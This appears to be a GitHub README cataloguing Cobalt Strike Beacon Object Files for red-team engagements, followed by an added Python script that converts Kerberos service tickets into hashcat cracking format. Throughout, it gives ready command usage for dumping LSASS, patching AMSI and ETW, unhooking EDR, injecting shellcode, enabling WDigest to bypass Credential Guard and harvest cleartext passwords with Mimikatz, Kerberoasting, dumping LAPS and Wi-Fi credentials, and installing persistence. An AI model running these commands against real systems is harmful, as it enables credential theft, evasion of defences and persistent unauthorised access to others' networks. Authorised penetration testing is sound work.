Useful Cobalt Strike Beacon Object Files (BOFs) used during red teaming and penetration testing engagements.

hrtywhy/BOF-CobaltStrike

CobaltStrike BOF Collections


Enumeration

arp --> List arp tables
ipconfig --> Run ipconfig
ldapsearch [query]
listdns --> Pulls DNS cache
netuser [username] [opt: domain] --> Get info on user account
nslookup [hostname] --> Perform DNS query
tasklist --> Get local running processes
  • Find Objects BOF
    Uses direct system calls to enumerate processes that have a specific module loaded (amsi.dll, clr.dll) or that hold a handle to a given process (lsass.exe)
    Runs inline in the beacon process, so it avoids fork&run
FindModule amsi.dll
FindProcHandle lsass.exe
  • BOF Collection
    A set of BOFs useful for enumeration and exploitation. Examples include:
inline-execute GetDomainInfo.o --> Get domain info from DC

inline-execute GetClipboard.o --> Prints any text on the user's clipboard

enumwifi --> Enumerate wifi connections
dumpwifi Wifi_Profile_Name --> Dump wifi cleartext credentials

bofportscan 192.168.1.10 3389 --> Port scanner

inline-execute RegistryPersistence.o Install --> Install registry persistence
inline-execute RegistryPersistence.o Remove --> Remove registry persistence
  • whereami
    A "Where Am I" BOF that reproduces the output of whoami.exe in an OPSEC-safer way: instead of spawning the binary, it pulls the information from the current beacon process memory.
    Also dumps the current environment variables.
    whereami

  • RiccardoAncarani BOFs
    A useful BOF collection to perform various tasks in a safer opsec way.

send_shellcode_via_pipe <pipe> <file> --> Send shellcode (or any bytes) over a named pipe
cat <file> --> Read a file; supports remote shares
wts_enum_remote_processes <host> --> Enumerate remote processes using the WTS APIs
unhook <module> (e.g. unhook ntdll.dll) --> Use direct syscalls to unhook the APIs of a specific DLL (64-bit beacons only)
  • Outflank C2 Tool Collection
    Great list of useful tools converted to BOFs for better opsec.
    Tools like add machine account, kerberoast, LAPS password dump, SMB info, LDAP AD spray, and more!
AddMachineAccount [*Computername] [Optional Password] --> Create a new machine account; requires that ms-DS-MachineAccountQuota still allows the current user to add computers (the default quota is 10)
Domaininfo --> Enumerate the AD domain
Lapsdump <computername> --> Dump LAPS passwords from remote systems in AD (requires elevated privileges on the target)
Smbinfo <computername> --> Get SMB info of a remote system
Winver --> Show the version of Windows running on the local system

Executing .NET Assemblies

  • InlineExecute-Assembly
    Executes any .NET assembly in-process without requiring prior modification of the assembly
    The BOF also supports flags for disabling AMSI via in-memory patching, disabling and restoring ETW via in-memory patching, and customizing the name of the CLR AppDomain it creates
    inlineExecute-Assembly --dotnetassembly /home/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw --amsi --mailslot totallyLegitMailslot

  • inject-assembly
    Another alternative .NET executable loader to inject an assembly into a running process
    inject-assembly 0 /home/Rubeus.exe [args...]


Exploitation

  • ajpc500 BOFs
    A collection of very useful BOFs for various utilities including different techniques of shellcode injection with syscalls, process dumping (LSASS!), and patching ETW for better evasion.
etw stop --> Patch etw
syscalls_inject <PID> <listener_name> / syscalls_shinject <PID> <path_to_bin> --> Syscalls shellcode injection
syscalls_spawn <listener> / syscalls_shspawn <path_to_bin> --> Spawn and syscalls injections
static_syscalls_apc_spawn <listener> / static_syscalls_apc_spawn <path_to_bin> --> Spawn and static syscalls shellcode injection (NtQueueApcThread)
static_syscalls_inject <PID> <listener_name> / static_syscalls_shinject <PID> <path_to_bin> --> Static syscalls shellcode injection (NtCreateThreadEx)
static_syscalls_dump <PID> [path_to_output] --> Process dump with syscalls (i.e. Dump LSASS!)
  • MiniDumpWriteDump
    Uses static syscalls to dump a process such as LSASS to output file
    minidumpwritedump <PID> <path_of_dmp>

  • SilentLsassDump
    Uses direct syscalls generated from https://github.com/outflanknl/InlineWhispers
    Dumps the LSASS process via the Windows silent process exit mechanism into the C:\Temp directory
    silentLsassDump <LSASS PID>

  • Unhook BOF
    Created by Raphael Mudge, this BOF attempts to unhook userland APIs to bypass EDR hooks
    Something of a "hail mary" attempt at unhooking: it tries to restore every hooked API rather than targeting one module
    unhook

  • WdToggle
    Enables WDigest credential caching using direct system calls
    Bypasses Windows Credential Guard if enabled

inline-execute WdToggle.o --> First, enable WDigest credential caching
logonpasswords --> Second, wait for users to log in, then run Mimikatz to dump their newly cached cleartext passwords
  • TrustedSec CS-Remote-OPs-BOF
    Great repo of new BOFs from TrustedSec to follow up their SituationalAwareness BOFs.
    Includes dumping a process, decrypting Chrome keys, persistence techniques (registry, scheduled tasks, services), and more!
adcs_request --> Request an enrollment certificate
procdump --> Dump specified process to output file
reg_set --> Set/create a registry key
sc_create --> Create a new service
schtaskscreate --> Create a new scheduled task
setuserpass --> Set a user's password
  • Inject AMSI Bypass
    BOF that bypasses AMSI in a remote process with code injection
    inject-amsiBypass <PID>

  • Inject ETW Bypass
    Inject ETW Bypass into Remote Process via Syscalls
    injectEtwBypass <PID>

  • Kerberoast BOF
    BOF for targeted Kerberoasting of a given SPN
    Returns the TGS, which you can pass to apreq2hashcat.py (provided in the repo) to produce the hashcat format
    kerberoast SPN/HOSTNAME.domain.local
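
The TGS-to-hashcat conversion mentioned above, as an added example that is not the Kerberoast BOF's own apreq2hashcat.py. It walks the DER structure of a Kerberos Ticket (optionally unwrapping it from an AP-REQ), pulls the realm, the SPN and the enc-part, and emits the krb5tgs line in the layout Rubeus/hashcat use: mode 13100 for RC4-HMAC (etype 23, 16-byte checksum in front of the ciphertext) and modes 19600/19700 for AES (etype 17/18, 12-byte checksum at the end). The realm, SPN, account name and cipher bytes are all constructed sample data, and nothing here performs cryptography; a real run would feed it the raw ticket bytes the BOF returns.

```python
# Added example (not the kerberoast BOF's apreq2hashcat.py): turn the Ticket
# inside an AP-REQ / TGS-REP into hashcat's $krb5tgs$ format. Only the DER
# structure is parsed; no cryptography is performed. All sample data below is
# constructed, and every name (CORP.LOCAL, svc_sql, ...) is hypothetical.

# --- minimal DER helpers: tag, length, value -------------------------------
def der_encode(tag: int, content: bytes) -> bytes:
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content

def der_decode(buf: bytes, pos: int = 0):
    """Return (tag, content, position after this TLV) for the TLV at buf[pos]."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        n, hdr = first, 2
    else:
        k = first & 0x7F
        n, hdr = int.from_bytes(buf[pos + 2:pos + 2 + k], "big"), 2 + k
    start = pos + hdr
    return tag, buf[start:start + n], start + n

def der_iter(constructed: bytes):
    """Yield (tag, content) for each TLV inside a constructed value."""
    pos = 0
    while pos < len(constructed):
        tag, val, pos = der_decode(constructed, pos)
        yield tag, val

def der_fields(constructed: bytes) -> dict:
    """Map explicit context tag number [n] -> its content, for a Kerberos SEQUENCE body."""
    return {tag & 0x1F: val for tag, val in der_iter(constructed)}

# Kerberos uses explicit tagging: [n] X is encoded as context tag 0xA0|n wrapped around X.
def ctx(n, inner): return der_encode(0xA0 | n, inner)
def integer(v): return der_encode(0x02, bytes([v]))        # small non-negative ints only
def gstring(s): return der_encode(0x1B, s.encode())         # KerberosString = GeneralString
def sequence(*items): return der_encode(0x30, b"".join(items))

def build_ticket(realm, spn_parts, etype, cipher):
    """Constructed Ticket ::= [APPLICATION 1] SEQUENCE { tkt-vno, realm, sname, enc-part }."""
    sname = sequence(ctx(0, integer(2)),                                  # name-type NT-SRV-INST
                     ctx(1, sequence(*[gstring(p) for p in spn_parts])))  # name-string
    enc_part = sequence(ctx(0, integer(etype)), ctx(1, integer(2)),       # etype, kvno
                        ctx(2, der_encode(0x04, cipher)))                 # cipher OCTET STRING
    body = sequence(ctx(0, integer(5)), ctx(1, gstring(realm)), ctx(2, sname), ctx(3, enc_part))
    return der_encode(0x61, body)

def parse_ticket(data: bytes):
    """Return (realm, spn, etype, cipher) from a Ticket, or from the Ticket inside an AP-REQ."""
    tag, body, _ = der_decode(data)
    if tag == 0x6E:                       # AP-REQ ([APPLICATION 14]): the Ticket is field [3]
        tag, body, _ = der_decode(der_fields(der_decode(body)[1])[3])
    if tag != 0x61:
        raise ValueError("not a Kerberos Ticket ([APPLICATION 1])")
    f = der_fields(der_decode(body)[1])
    realm = der_decode(f[1])[1].decode()
    sname = der_fields(der_decode(f[2])[1])
    spn = "/".join(v.decode() for _, v in der_iter(der_decode(sname[1])[1]))
    enc = der_fields(der_decode(f[3])[1])
    etype = int.from_bytes(der_decode(enc[0])[1], "big", signed=True)
    cipher = der_decode(enc[2])[1]
    return realm, spn, etype, cipher

def to_hashcat(user, realm, spn, etype, cipher) -> str:
    """Rubeus/hashcat layouts: 13100 for RC4 (etype 23), 19600/19700 for AES (17/18)."""
    h = cipher.hex()
    if etype == 23:          # RC4-HMAC: 16-byte HMAC-MD5 checksum precedes the ciphertext
        return f"$krb5tgs$23$*{user}${realm}${spn}*${h[:32]}${h[32:]}"
    if etype in (17, 18):    # AES-CTS: 12-byte HMAC-SHA1-96 checksum trails the ciphertext
        return f"$krb5tgs${etype}${user}${realm}$*{spn}*${h[-24:]}${h[:-24]}"
    raise ValueError(f"etype {etype} has no krb5tgs hashcat mode")

def ticket_to_hashcat(ticket_der: bytes, user: str) -> str:
    realm, spn, etype, cipher = parse_ticket(ticket_der)
    return to_hashcat(user, realm, spn, etype, cipher)

# Constructed sample: an RC4 ticket for a hypothetical MSSQL service account.
SAMPLE_CIPHER = bytes(range(16)) + bytes(range(48))   # fake checksum || fake ciphertext
SAMPLE_TICKET = build_ticket("CORP.LOCAL", ["MSSQLSvc", "sql01.corp.local:1433"], 23, SAMPLE_CIPHER)

if __name__ == "__main__":
    print(ticket_to_hashcat(SAMPLE_TICKET, "svc_sql"))
```

The account name is not inside the ticket (the ticket names the service, not the requesting user), so it is passed in separately, as the BOF's SPN argument and your own enumeration supply it; an etype other than 23/17/18 is rejected rather than silently emitted in the wrong layout.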


Miscellaneous

  • BOF Template
    Used for creating your very own BOFs!

  • BOF Hound
    An offline BloodHound ingestor and LDAP parser to be used with TrustedSec's "ldapsearch".
    Use ldapsearch in Cobalt Strike to gather data and then use bofhound on your CS logs to generate JSON files for importing into BloodHound.
    bofhound -o /data/

  • Help Color
    Color helper Aggressor script for coloring "help" output based on command type and OPSEC
    helpx
